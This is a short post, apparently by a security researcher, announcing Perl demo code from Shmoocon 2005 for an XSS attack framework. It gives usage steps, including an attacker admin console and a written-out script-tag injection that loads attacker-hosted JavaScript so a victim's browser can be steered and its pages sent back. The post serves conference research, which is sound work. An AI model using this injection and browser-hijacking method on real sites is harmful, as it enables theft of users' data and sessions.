I have uploaded my demo code from Shmoocon 2005. I'll be putting a more descriptive page, instructions, whitepaper and shmoocon slides up over the next few days.
Here's an overview on using the tool
1 - modify the perl script vars $code_server and $PORT to point to the system that you will be running the perl script on. (defaults to port 80 and http://localhost )
2 - run the perl script and point the attack browser at /admin on the server you are running the perl script. (with defaults would be http://localhost/admin\). This is the attacker admin console.
3 - the initialization URL a victim needs to point to is /xss2.js - Your initial XSS vector needs to point back to the perl server and this filename (ie for XSSing your own browser with local code server, enter <script src="http://localhost/xss2.js"></script>)
4 - after you have a victim initialized and in a wait loop, you can either browse the / document of the XSS site and click on links you want the victim to visit and forward back, or you can enter documents/variables in the associated form inputs.... read more